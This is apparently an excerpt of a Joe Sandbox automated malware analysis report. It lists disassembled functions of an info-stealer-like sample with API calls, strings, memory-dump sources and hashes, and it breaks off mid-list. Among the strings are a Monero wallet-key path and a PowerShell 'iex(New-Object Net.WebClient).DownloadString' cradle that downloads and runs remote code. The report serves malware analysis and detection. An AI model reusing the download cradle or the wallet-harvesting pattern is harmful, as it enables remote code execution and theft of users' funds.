                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF8137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FF8158
                                    • wsprintfA.USER32 ref: 00FF81AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 7333617f2395d369f3e1f7faa4066222b810ec624a85779f35fe44a844cac506
                                    • Instruction ID: 5726e17aa5d3d2c6d26bd810a39b69014facae9be155101b99697c3b052f215c
                                    • Opcode Fuzzy Hash: 7333617f2395d369f3e1f7faa4066222b810ec624a85779f35fe44a844cac506
                                    • Instruction Fuzzy Hash: 852129B1E4420CABDB10DFD4DC49FBEB7B9EB44B50F104209F705AB684D7B859018BA5
                                    Function 00FF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FF8426
                                    • wsprintfA.USER32 ref: 00FF8459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FF847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF8499
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,0180E2A8,00000000,000F003F,?,00000400), ref: 00FF84EC
                                    • lstrlen.KERNEL32(?), ref: 00FF8501
                                    • RegQueryValueExA.ADVAPI32(00000000,0180E1B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,01000B34), ref: 00FF8599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF8608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: 5d81295aa7669f84945aefbaec49bf892a3e65666dc4c7b1e4cec5708898f324
                                    • Instruction ID: 79ab8bb0c998e454b91fa902f66aa98de415e13a377e17ba4d4a752194f528ef
                                    • Opcode Fuzzy Hash: 5d81295aa7669f84945aefbaec49bf892a3e65666dc4c7b1e4cec5708898f324
                                    • Instruction Fuzzy Hash: 6321F6B190021CABDB24DF54DC85FE9B7B8FF48700F00C598E609A6580DF716A86CF94
                                    Function 00FF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF76A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF76AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,017FB770,00000000,00020119,00000000), ref: 00FF76DD
                                    • RegQueryValueExA.ADVAPI32(00000000,0180E248,00000000,00000000,?,000000FF), ref: 00FF76FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FF7708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: 77f0e92c124304b0e2ed7d4bd4ac6962e086d1440154d1b1d0b6b639cc4300a4
                                    • Instruction ID: 31ceef6e9632ac8e7771b98941c11ace17062e667bc47a785d3bd485bf0806ee
                                    • Opcode Fuzzy Hash: 77f0e92c124304b0e2ed7d4bd4ac6962e086d1440154d1b1d0b6b639cc4300a4
                                    • Instruction Fuzzy Hash: 5E012CB5A04309BBE720EFA4EC4DF6DB7B8EB48701F104454FB05D7A84D6B499009B51
                                    Function 00FF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,017FB770,00000000,00020119,00FF76B9), ref: 00FF775B
                                    • RegQueryValueExA.ADVAPI32(00FF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FF777A
                                    • RegCloseKey.ADVAPI32(00FF76B9), ref: 00FF7784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 8aab2bfe95dd3669a12a83651bb2458415d023a671cfb6f195124ac11e40d2be
                                    • Instruction ID: d87cf7525bce74b6b09e64b1818202d92b21c3092e7638adc57f2275e20639a2
                                    • Opcode Fuzzy Hash: 8aab2bfe95dd3669a12a83651bb2458415d023a671cfb6f195124ac11e40d2be
                                    • Instruction Fuzzy Hash: D80144B5A40308BBDB20DFE0EC4DFAEB7B8EB48700F104558FA05A7685D6B05900CB51
                                    Function 00FE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                    • LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: c84cfde95bcff4f5f269c52cd3f8f2200eaa24689e83c1f1822aef870e81aad4
                                    • Instruction ID: 88991a6952dcafa1fa93b7a41a377b821898a9cd4ca19e53b69698ee17657fa6
                                    • Opcode Fuzzy Hash: c84cfde95bcff4f5f269c52cd3f8f2200eaa24689e83c1f1822aef870e81aad4
                                    • Instruction Fuzzy Hash: 67315CB4E00209EFDB24CF95D889BAE77B4FF48710F108168E901A7290D7B8A941DFA0
                                    Function 00FF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,0180E470), ref: 00FF47DB
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4801
                                    • lstrcat.KERNEL32(?,?), ref: 00FF4820
                                    • lstrcat.KERNEL32(?,?), ref: 00FF4834
                                    • lstrcat.KERNEL32(?,017FAC70), ref: 00FF4847
                                    • lstrcat.KERNEL32(?,?), ref: 00FF485B
                                    • lstrcat.KERNEL32(?,0180D968), ref: 00FF486F
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FF8D90: GetFileAttributesA.KERNEL32(00000000,?,00FE1B54,?,?,0100564C,?,?,01000E1F), ref: 00FF8D9F
                                      • Part of subcall function 00FF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FF4580
                                      • Part of subcall function 00FF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FF4587
                                      • Part of subcall function 00FF4570: wsprintfA.USER32 ref: 00FF45A6
                                      • Part of subcall function 00FF4570: FindFirstFileA.KERNEL32(?,?), ref: 00FF45BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 60ce056f3211d68037717e95b311ec51aa48f4f4311b764fbb290e5132fdb527
                                    • Instruction ID: 9cc171c3bf6470b01818d9978ad560c9eedad05641643ca61075d19dd77bfae7
                                    • Opcode Fuzzy Hash: 60ce056f3211d68037717e95b311ec51aa48f4f4311b764fbb290e5132fdb527
                                    • Instruction Fuzzy Hash: 9F3153B690021C67CB30FBA0DC89EFD7378AF58700F404589F31996495EEB8D689DB95
                                    Function 00FF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF2D85
                                    Strings
                                    • ')", xrefs: 00FF2CB3
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FF2CC4
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FF2D04
                                    • <, xrefs: 00FF2D39
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 47dff613484b3b737328bb19bde95c125d5d5adb7816e66160e41b7f4a5eaa51
                                    • Instruction ID: 95a49c52114a285144ef630da4a28f34b9a5a3bd6bbaa5c2c48fa2a22d31206e
                                    • Opcode Fuzzy Hash: 47dff613484b3b737328bb19bde95c125d5d5adb7816e66160e41b7f4a5eaa51
                                    • Instruction Fuzzy Hash: 2141CFB1C1010C9ADB14EFA0CC91BFDB774AF10340F504119F61AAB1A5EFB86A5ADF91
                                    Function 00FE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FE9F41
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: b8b4f5a8a5d8a7020c67a079da991a2a6d9602809a51c21cafd99754a84fee1c
                                    • Instruction ID: 179ca54cca60f6d9a9940394b0d29482b4a20ea5f91438b7e418a8770ce61fac
                                    • Opcode Fuzzy Hash: b8b4f5a8a5d8a7020c67a079da991a2a6d9602809a51c21cafd99754a84fee1c
                                    • Instruction Fuzzy Hash: 0E61307190024CEBDB24EFA5CC96FED7775AF44340F008118FA0A5F1A5EBB86A05DB92
                                    Function 00FF40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0180D908,00000000,00020119,?), ref: 00FF40F4
                                    • RegQueryValueExA.ADVAPI32(?,0180E590,00000000,00000000,00000000,000000FF), ref: 00FF4118
                                    • RegCloseKey.ADVAPI32(?), ref: 00FF4122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4147
                                    • lstrcat.KERNEL32(?,0180E4A0), ref: 00FF415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 6c59cfc6695fa82dca77543d9f2f480aeb97730dbb744ea9be848c30fe8c0b1d
                                    • Instruction ID: ce86eec6f47a6a79c9e9367496490cc953f315ff12ea98f8fdf148043a689253
                                    • Opcode Fuzzy Hash: 6c59cfc6695fa82dca77543d9f2f480aeb97730dbb744ea9be848c30fe8c0b1d
                                    • Instruction Fuzzy Hash: 6A4156B69002086BDB34EFA0EC4AFFE737DBB88300F444558F71557585EA759B888B91
                                    Function 00FF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00FF696C
                                    • sscanf.NTDLL ref: 00FF6999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FF69B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FF69C0
                                    • ExitProcess.KERNEL32 ref: 00FF69DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
